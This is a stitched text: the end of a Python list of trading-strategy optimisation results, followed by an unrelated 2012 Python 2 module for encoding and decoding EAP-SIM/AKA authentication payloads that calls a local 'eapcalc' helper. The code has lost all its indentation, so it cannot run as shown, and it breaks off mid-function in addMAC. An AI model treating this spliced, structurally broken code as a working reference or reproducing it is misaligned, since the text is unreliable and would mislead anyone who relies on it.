['t]bik', 57, 35, 9.33, 62, 8, 4.47, {'ott_len': 35, 'ott_percent': 217, 'ott_bw': 134, 'tps_qty_index': 103, 'max_risk': 57}],
['-VW<v', 58, 60, 23.78, 58, 12, 3.9, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 32, 'max_risk': 64}],
['-VWMv', 50, 61, 23.08, 58, 12, 3.48, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 59, 'max_risk': 64}],
['-VW.v', 49, 61, 23.86, 58, 12, 4.35, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 64}],
['7Fpob', 66, 12, 12.15, 75, 4, 3.62, {'ott_len': 27, 'ott_percent': 189, 'ott_bw': 151, 'tps_qty_index': 112, 'max_risk': 52}],
['3OW?n', 54, 59, 24.5, 66, 12, 3.73, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 36, 'max_risk': 59}],
['-VWWu', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
[',VWWv', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['-VWWs', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 62}],
['vNqn]', 81, 11, 12.65, 100, 4, 9.27, {'ott_len': 35, 'ott_percent': 199, 'ott_bw': 152, 'tps_qty_index': 111, 'max_risk': 49}],
['-VWWl', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 58}],
['-VWWa', 58, 60, 22.96, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 51}],
['-VWW^', 58, 60, 22.96, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 49}],
['3OW5n', 50, 59, 24.24, 66, 12, 4.05, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 21, 'max_risk': 59}],
['-VWLv', 50, 60, 24.44, 58, 12, 2.84, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 57, 'max_risk': 64}],
['=ptVt', 73, 26, 30.29, 50, 8, 1.89, {'ott_len': 28, 'ott_percent': 241, 'ott_bw': 156, 'tps_qty_index': 73, 'max_risk': 63}],
['g^VGt', 57, 61, 16.78, 63, 11, 5.52, {'ott_len': 33, 'ott_percent': 219, 'ott_bw': 119, 'tps_qty_index': 49, 'max_risk': 63}],
['HPqWv', 64, 17, 16.65, 60, 5, 2.69, {'ott_len': 29, 'ott_percent': 201, 'ott_bw': 152, 'tps_qty_index': 74, 'max_risk': 64}],
['-VW=v', 55, 61, 21.99, 58, 12, 3.27, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 33, 'max_risk': 64}],
['-VW?v', 55, 61, 23.02, 58, 12, 3.04, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 36, 'max_risk': 64}],
['eRQWv', 52, 63, 17.59, 63, 11, 4.81, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 112, 'tps_qty_index': 74, 'max_risk': 64}],
['-dW6n', 51, 64, 27.68, 58, 12, 5.23, {'ott_len': 26, 'ott_percent': 226, 'ott_bw': 120, 'tps_qty_index': 22, 'max_risk': 59}],
['@VX*?', 50, 53, 24.04, 50, 10, 1.23, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 121, 'tps_qty_index': 3, 'max_risk': 30}],
['[\\sta', 66, 18, 12.71, 80, 5, 5.61, {'ott_len': 31, 'ott_percent': 216, 'ott_bw': 155, 'tps_qty_index': 120, 'max_risk': 51}],
['ePRWv', 53, 60, 20.61, 63, 11, 4.2, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 114, 'tps_qty_index': 74, 'max_risk': 64}],
['O=ITi', 49, 69, 21.32, 61, 13, 4.06, {'ott_len': 30, 'ott_percent': 177, 'ott_bw': 102, 'tps_qty_index': 70, 'max_risk': 56}],
['YOR9c', 51, 60, 21.87, 58, 12, 2.39, {'ott_len': 31, 'ott_percent': 200, 'ott_bw': 114, 'tps_qty_index': 27, 'max_risk': 52}],
['-VW;v', 56, 60, 21.81, 58, 12, 3.24, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 30, 'max_risk': 64}],
['eEsWv', 66, 9, 10.3, 75, 4, 5.13, {'ott_len': 33, 'ott_percent': 187, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['?^WWv', 53, 60, 21.94, 63, 11, 6.61, {'ott_len': 28, 'ott_percent': 219, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['=bVNC', 46, 62, 22.8, 50, 12, -0.59, {'ott_len': 28, 'ott_percent': 224, 'ott_bw': 119, 'tps_qty_index': 60, 'max_risk': 32}],
['3eWXn', 53, 64, 29.51, 58, 12, 4.39, {'ott_len': 26, 'ott_percent': 227, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 59}],
['FVW*?', 50, 53, 22.75, 36, 11, -1.52, {'ott_len': 29, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['?dpMr', 61, 26, 28.05, 50, 8, 2.43, {'ott_len': 28, 'ott_percent': 226, 'ott_bw': 151, 'tps_qty_index': 59, 'max_risk': 62}],
['3fWHn', 56, 64, 27.28, 58, 12, 4.26, {'ott_len': 26, 'ott_percent': 229, 'ott_bw': 120, 'tps_qty_index': 51, 'max_risk': 59}],
['QYRcn', 50, 65, 19.63, 58, 12, 3.49, {'ott_len': 30, 'ott_percent': 212, 'ott_bw': 114, 'tps_qty_index': 93, 'max_risk': 59}],
['IVWWv', 51, 58, 22.46, 58, 12, 1.85, {'ott_len': 29, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['?VW.v', 49, 59, 25.96, 58, 12, 2.45, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 64}],
['MVsWv', 66, 18, 17.72, 60, 5, 4.17, {'ott_len': 30, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['@VW*F', 49, 55, 26.22, 45, 11, -0.99, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 34}],
['?VW2v', 52, 59, 27.13, 58, 12, 2.6, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 16, 'max_risk': 64}],
['eVkWv', 72, 22, 20.19, 66, 6, 5.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 145, 'tps_qty_index': 74, 'max_risk': 64}],
['?VuWv', 62, 16, 15.34, 60, 5, 2.75, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 157, 'tps_qty_index': 74, 'max_risk': 64}],
['hPmHf', 73, 19, 19.46, 75, 4, 4.96, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 147, 'tps_qty_index': 51, 'max_risk': 54}],
['hPPHs', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 62}],
['ePPHt', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 63}],
['XRV.a', 50, 54, 25.07, 58, 12, 1.52, {'ott_len': 31, 'ott_percent': 204, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['ePPHa', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 51}],
['ePPH]', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 49}],
['CMNWv', 52, 71, 22.36, 58, 12, 4.3, {'ott_len': 28, 'ott_percent': 197, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['BVV.a', 50, 59, 27.82, 58, 12, 2.71, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['<VV.a', 50, 59, 27.82, 58, 12, 2.71, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['ePjWv', 68, 22, 19.21, 66, 6, 5.68, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 144, 'tps_qty_index': 74, 'max_risk': 64}],
['-VW*=', 55, 54, 29.83, 33, 12, -1.75, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 28}],
['WrVZ;', 49, 65, 9.97, 50, 10, -1.45, {'ott_len': 31, 'ott_percent': 244, 'ott_bw': 119, 'tps_qty_index': 79, 'max_risk': 27}],
['@VW)?', 48, 54, 23.4, 45, 11, -1.08, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 2, 'max_risk': 30}],
['E^c[A', 58, 34, 10.18, 50, 10, -1.0, {'ott_len': 29, 'ott_percent': 219, 'ott_bw': 135, 'tps_qty_index': 81, 'max_risk': 31}],
['[VsWv', 63, 19, 14.24, 75, 4, 6.76, {'ott_len': 31, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['WVsWv', 63, 19, 14.24, 75, 4, 6.76, {'ott_len': 31, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['fVPWv', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 64}],
['gVPWv', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 64}],
['o4,@X', 42, 98, 8.28, 45, 20, 5.45, {'ott_len': 34, 'ott_percent': 166, 'ott_bw': 66, 'tps_qty_index': 38, 'max_risk': 45}],
['@VW*A', 49, 55, 25.8, 45, 11, -0.99, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 31}],
['@VW.?', 49, 55, 20.38, 45, 11, -0.98, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 30}],
['@VWF?', 54, 55, 19.17, 45, 11, -1.64, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 47, 'max_risk': 30}],
['ePPWb', 52, 63, 19.94, 63, 11, 4.8, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 52}],
['ePPW\\', 52, 63, 19.94, 63, 11, 4.8, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 48}],
['eSNWd', 50, 67, 18.68, 53, 13, 2.22, {'ott_len': 33, 'ott_percent': 205, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 53}],
['@XW*?', 50, 54, 25.83, 50, 10, 1.55, {'ott_len': 28, 'ott_percent': 211, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['@VW4?', 49, 55, 17.59, 45, 11, -1.73, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 19, 'max_risk': 30}],
['eVPWc', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 52}],
['`RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['cRNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['\\RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
[']RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['aRNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['^RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['_RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['eRNDv', 53, 67, 17.86, 53, 13, 3.08, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 44, 'max_risk': 64}],
['eRNWk', 52, 67, 17.52, 53, 13, 2.3, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 57}],
['eRNWZ', 52, 67, 17.52, 53, 13, 2.3, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 47}],
['LewDb', 76, 17, 19.15, 80, 5, 8.45, {'ott_len': 30, 'ott_percent': 227, 'ott_bw': 160, 'tps_qty_index': 44, 'max_risk': 52}],
]
|
#!/usr/bin/env python
##################################################################
# Copyright (c) 2012, Sergej Srepfler <sergej.srepfler@gmail.com>
# February 2012 - May 2012
# Version 0.2.8, Last change on May 31, 2012
# This software is distributed under the terms of BSD license.
##################################################################
# All functions needed to build/decode EAP Payload
import xml.dom.minidom as minidom
import struct
import sys
import logging
import time
import platform
#import string
# subprocess does not work as expected in python 2.4
# so we use commands instead
# but for Windows commands does not work, so...
import subprocess
import commands
ERROR=-1
# EAP-Payload specific definitions
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
# EAP Method Types as allocated by IANA:
# http://www.iana.org/assignments/eap-numbers
# Only supported types are listed here
EAP_TYPE_IDENTITY = 1
EAP_TYPE_SIM = 18
EAP_TYPE_AKA = 23
EAP_TYPE_AKAPRIME = 50
class EAPItem:
def __init__(self):
self.cmd=0
self.id=0
self.len=0
self.type=0
self.stype=0
self.msg=""
self.avps=[]
#----------------------------------------------------------------------
# Quit program with error
def e_bailOut(msg):
logging.error(msg)
sys.exit(1)
#Split message into parts (remove field from remaining body)
def e_chop_msg(msg,size):
return (msg[0:size],msg[size:])
def decodeU32(data):
ret=struct.unpack("!I",data.decode("hex"))[0]
return int(ret)
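# Quick illustration of the two helpers above (Python 2 semantics, since
# decodeU32 relies on str.decode("hex")):
#   e_chop_msg("0201000A", 2)  ->  ("02", "01000A")
#   decodeU32("00000009")      ->  9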
#----------------------------------------------------------------------
# Load diameter dictionary
def LoadEAPDictionary(file):
global dict_eaps
global dict_eapsubs
doc = minidom.parse(file)
node = doc.documentElement
dict_eaps=doc.getElementsByTagName("eap")
dict_eapsubs=doc.getElementsByTagName("eapsub")
def dictEAPname2code(name):
dbg="Searching EAP dictionary for N",name
logging.debug(dbg)
for eap in dict_eaps:
Name=eap.getAttribute("name")
Code=eap.getAttribute("code")
Reserved=eap.getAttribute("reserved")
if name==Name:
return (int(Code),Reserved)
dbg="Searching EAP dictionary failed for N",name
e_bailOut(dbg)
def dictEAPcode2name(code):
dbg="Searching EAP dictionary for C",code
logging.debug(dbg)
for eap in dict_eaps:
Name=eap.getAttribute("name")
Code=eap.getAttribute("code")
Reserved=eap.getAttribute("reserved")
if code==int(Code):
return (Name,Reserved)
dbg="Searching EAP dictionary failed for C",code
e_bailOut(dbg)
#Not used here, but in tool_Payload_decode.py
def dictEAPSUBtype2name(stype):
dbg="Searching EAP dictionary for S",stype
logging.debug(dbg)
for eap in dict_eapsubs:
Name=eap.getAttribute("name")
Stype=eap.getAttribute("subtype")
if Stype=="":
Stype=str(ERROR)
if stype==int(Stype):
return Name
dbg="Searching EAP dictionary failed for S",stype
e_bailOut(dbg)
#Not used here, but in client/example
def dictEAPSUBname2type(name):
dbg="Searching EAP dictionary for N",name
logging.debug(dbg)
for eap in dict_eapsubs:
Name=eap.getAttribute("name")
Stype=eap.getAttribute("subtype")
if name==Name:
return int(Stype)
dbg="Searching EAP dictionary failed for N",name
e_bailOut(dbg)
# EAP Packet format
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Code | Identifier | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Data ...
# +-+-+-+-+
# AT_SELECTED_VERSION - decode as value (Reserved field is value)
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AT_SELECTED...| Length = 1 | Selected Version |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# AT_NONCE_MT - decode as reserved (reserved field is not used)
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |AT_NONCE_MT | Length = 5 | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# . NONCE_MT .
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# AT_IDENTITY - decode as bytelen (Reserved field is len in bytes).
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AT_IDENTITY | Length | Actual Identity Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# . Identity (optional) .
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# AT_PADDING - decode as include (Include reserved field)
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AT_PADDING | Length | Padding... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |
# . .
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# AT_RES - decode as bitlen (RES Length is in bit length)
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AT_RES | Length | RES Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-|
# . RES .
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
def getEAPTypeName(type):
if type==EAP_TYPE_IDENTITY:
return ("Identity",0)
if type==EAP_TYPE_SIM:
return ("EAP-SIM",0)
if type==EAP_TYPE_AKA:
return ("EAP-AKA",0)
if type==EAP_TYPE_AKAPRIME:
return ("EAP-AKA'",0)
return ("ERROR",ERROR)
def getEAPCodeName(code):
if code==EAP_CODE_REQUEST:
return "EAP-Request"
if code==EAP_CODE_RESPONSE:
return "EAP-Response"
if code==EAP_CODE_SUCCESS:
return "EAP-Success"
if code==EAP_CODE_FAILURE:
return "EAP-Failure"
return "ERROR"
# EAP-AKA(SIM) Header
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Code | Identifier | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type | Subtype | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# EAP AVPs can't be left as raw due to different packing methods
# So they MUST be packed as AVP tuples
def decode_EAP(msg):
EAP=EAPItem()
(scode,msg)=e_chop_msg(msg,2)
EAP.code=ord(scode.decode("hex"))
(sid,msg)=e_chop_msg(msg,2)
EAP.id=ord(sid.decode("hex"))
(slen,msg)=e_chop_msg(msg,4)
EAP.len=decodeU32("0000"+slen)
dbg="Decoding EAP-Payload","C",EAP.code,"I",EAP.id,"L",EAP.len
logging.debug(dbg)
#Failure does not have type, so stop here
if EAP.code==EAP_CODE_FAILURE:
return EAP
if EAP.code==EAP_CODE_SUCCESS:
return EAP
(stype,msg)=e_chop_msg(msg,2)
EAP.type=ord(stype.decode("hex"))
(et,er)=getEAPTypeName(EAP.type)
dbg="Debugging EAP-Payload","T",EAP.type,et,er
logging.debug(dbg)
#Identity has no other AVPs inside
if EAP.type==EAP_TYPE_IDENTITY:
EAP.avps.append(("Identity",msg.decode("hex")))
return EAP
if er!=ERROR:
(ssub,msg)=e_chop_msg(msg,2)
(sres,msg)=e_chop_msg(msg,4)
EAP.stype=decodeU32("000000"+ssub)
EAP.msg=msg
EAP.avps=splitEAPAVPs(msg)
return EAP
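# Illustrative example (Python 2, using the hex-string convention above):
# decoding an EAP-Response/Identity carrying the identity "user" (hex 75736572)
#   eap = decode_EAP("020100090175736572")
#   eap.code -> 2 (EAP-Response), eap.id -> 1, eap.len -> 9
#   eap.avps -> [("Identity", "user")]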
def encode_EAP(E):
# since all data is hex encoded, divide by 2 and add header length
if int(E.cmd)==EAP_CODE_FAILURE:
E.len=4
ret="%02X" % E.cmd+"%02X"%E.id+"%04X"%E.len
dbg="EAP-Payload",ret
logging.debug(dbg)
return ret
if int(E.cmd)==EAP_CODE_SUCCESS:
E.len=4
ret="%02X" % E.cmd+"%02X"%E.id+"%04X"%E.len
dbg="EAP-Payload",ret
logging.debug(dbg)
return ret
if E.type==EAP_TYPE_IDENTITY:
E.len=4+len(E.msg)/2
ret="%02X" % E.cmd+"%02X"%E.id+"%04X"%E.len
ret=ret+E.msg
dbg="EAP-Payload",ret
logging.debug(dbg)
return ret
E.msg=joinEAPAVP(E.avps)
# Update len to new value
E.len=len(E.msg)/2+8
ret1="%02X" % E.cmd +"%02X"%E.id +"%04X"%E.len
ret2="%02X" % E.type+"%02X"%E.stype+"0000"
ret=ret1+ret2+E.msg
dbg="EAP-Payload",ret
logging.debug(dbg)
return ret
def splitEAPAVPs(msg):
avps=[]
while len(msg)>0:
(stype,msg)=e_chop_msg(msg,2) # Type
(slen,msg)=e_chop_msg(msg,2) # Len
(mtype,resdef)=dictEAPcode2name(decodeU32("000000"+stype))
mlen=ord(slen.decode("hex"))
(reserved,msg)=e_chop_msg(msg,4) # Reserved
(dmsg,msg)=e_chop_msg(msg,2*4*(mlen-1)) # Data
check=0
if resdef=="value":
check+=1
data=reserved
if resdef=="reserved":
check+=1
data=dmsg
if resdef=="bitlen":
check+=1
reslen=decodeU32("0000"+reserved)/4
data=dmsg[:reslen]
if resdef=="bytelen":
check+=1
reslen=decodeU32("0000"+reserved)*2
data=dmsg[:reslen]
if resdef=="include":
check+=1
data=reserved+dmsg
if check==0:
# All undefined values are skipped
e_bailOut("Unsuccessful decoding EAP AVP")
dbg="EAP AVP",mtype,"=",data,"+",resdef,"(",slen,")",len(data)/2,len(msg)/2
logging.debug(dbg)
avps.append((mtype,data))
return avps
def addEAPIdentity(msg):
return "%02X"%EAP_TYPE_IDENTITY+msg.encode("hex")
def addEAPAVP(name,value):
(code,reserved)=dictEAPname2code(name)
ret="%02X"%int(code)
mlen=(len(value)+7)/8+1
# Special case for AT_SELECTED_VERSION
if int(code)==16:
ret=ret+"01"
else:
ret=ret+"%02X"%mlen
dbg="Adding EAP",code,reserved,name,value
logging.debug(dbg)
# FIXME - this part of the code is not well tested.
check=0
if reserved=="bitlen":
ret=ret+"%04X"%(len(value)*4)
check+=1
if reserved=="bytelen":
ret=ret+"%04X"%(len(value)/2)
check+=1
if reserved=="include":
# This might be wrong, but I don't have any to test
check+=1
if reserved=="value":
check+=1
if check==0:
# All default and undefined values are 0
ret=ret+"0000"
ret=ret+value
# Fix padding
while len(ret)/2<calc_padding(len(ret)/2):
ret=ret+"00"
dbg="EAP Encoded as",ret
logging.debug(dbg)
return ret
# Calculate message padding
def calc_padding(msg_len):
return (msg_len+3)&~3
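# calc_padding rounds a byte length up to the next multiple of 4, e.g.
#   calc_padding(5) -> 8, calc_padding(8) -> 8, calc_padding(0) -> 0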
def joinEAPAVP(avps):
ret=""
for a in avps:
(name,value)=a
ret=ret+addEAPAVP(name,value)
return ret
def exec_calc(cmd_type,params):
args=cmd_type+" "+params
#p=subprocess.Popen(["./eapcalc",args],stdout=subprocess.PIPE)
#ret,err=p.communicate()
dbg="Calc input",platform.system(),cmd_type,params
logging.debug(dbg)
if platform.system()=="Windows":
p=subprocess.Popen("eapcalc.exe"+" "+args,stdout=subprocess.PIPE)
ret,err=p.communicate()
if platform.system()=="SunOS":
ret=commands.getoutput("./eapcalc.solx86"+" "+args)
#>>> platform.linux_distribution()
#('Mandriva Linux', '2010.0', 'Official')
# FIXME: Learn to make a distinction based on libc6 (e.g. RHEL/Ubuntu) to trigger the proper application
if platform.system()=="Linux":
ret=commands.getoutput("./eapcalc.linux"+" "+args)
dbg="Calc output",ret
logging.debug(dbg)
if cmd_type=="milenage-f2345":
#XRES,CK,IK,AK,AKS
XRES=findValue(ret,"XRES=")
CK=findValue(ret,"CK=")
IK=findValue(ret,"IK=")
AK=findValue(ret,"AK=")
AKS=findValue(ret,"AKS=")
return XRES,CK,IK,AK,AKS
if cmd_type=="milenage-f1":
#XMAC,MACS
XMAC=findValue(ret,"XMAC=")
MACS=findValue(ret,"MACS=")
return XMAC,MACS
if cmd_type=="mac-sim":
#MAC
MAC=findValue(ret,"MAC=")
return MAC
if cmd_type=="mac-aka":
#MAC
MAC=findValue(ret,"MAC=")
return MAC
if cmd_type=="mac-akaprime":
#MAC
MAC=findValue(ret,"MAC=")
return MAC
if cmd_type=="sim":
#KENCR,KAUT,MSK,EMSK,MK
MK=findValue(ret,"MK=")
KENCR=findValue(ret,"KENCR=")
KAUT=findValue(ret,"KAUT=")
MSK=findValue(ret,"MSK=")
EMSK=findValue(ret,"EMSK=")
return KENCR,KAUT,MSK,EMSK,MK
if cmd_type=="aka":
#KENCR,KAUT,MSK,EMSK,MK
MK=findValue(ret,"MK=")
KENCR=findValue(ret,"KENCR=")
KAUT=findValue(ret,"KAUT=")
MSK=findValue(ret,"MSK=")
EMSK=findValue(ret,"EMSK=")
return KENCR,KAUT,MSK,EMSK,MK
if cmd_type=="akaprime":
#KENCR,KAUT,MSK,EMSK,KRE
KENCR=findValue(ret,"KENCR=")
KAUT=findValue(ret,"KAUT=")
KRE=findValue(ret,"KRE=")
MSK=findValue(ret,"MSK=")
EMSK=findValue(ret,"EMSK=")
return KENCR,KAUT,MSK,EMSK,KRE
if cmd_type=="encode":
#ENCR_DATA
DATA=findValue(ret,"ENCRYPTED=")
return DATA
if cmd_type=="decode":
#RAW_DATA
DATA=findValue(ret,"DECRYPTED=")
return DATA
def findValue(res,start):
for x in res.split("\n"):
if x.startswith(start):
dbg="Value",x,x[-1]
logging.debug(dbg)
# Fix for windows CR+LF instead of CR
if x[-1]=="\r":
x=x[:-1]
ll=x.split("=")
return ll[1]
return ERROR
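# Example: findValue("XRES=abc\nCK=def", "CK=") returns "def";
# if the prefix is not present, ERROR (-1) is returned.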
def addMAC(E,K,D):
E.avps.append(("AT_MAC","00"*16))
tmp=encode_EAP(E)
#Clear it so we can do it again
E.msg=""
# Call hmac1 or hmac256 based on E.type
if E.type==EAP_TYPE_SIM:
hmac_type="mac-sim"
if E.type==EAP_TYPE_AKA:
hmac_type="mac-aka"
if E.type==EAP_TYPE_AKAPRIME:
hmac_type="mac-akaprime"
# Do the calc
dbg="Calculate ",hmac_type,K,tmp
logging.debug(dbg)
params="0x"+K
if E.type==EAP_TYPE_SIM:
params+=" 0x"+D
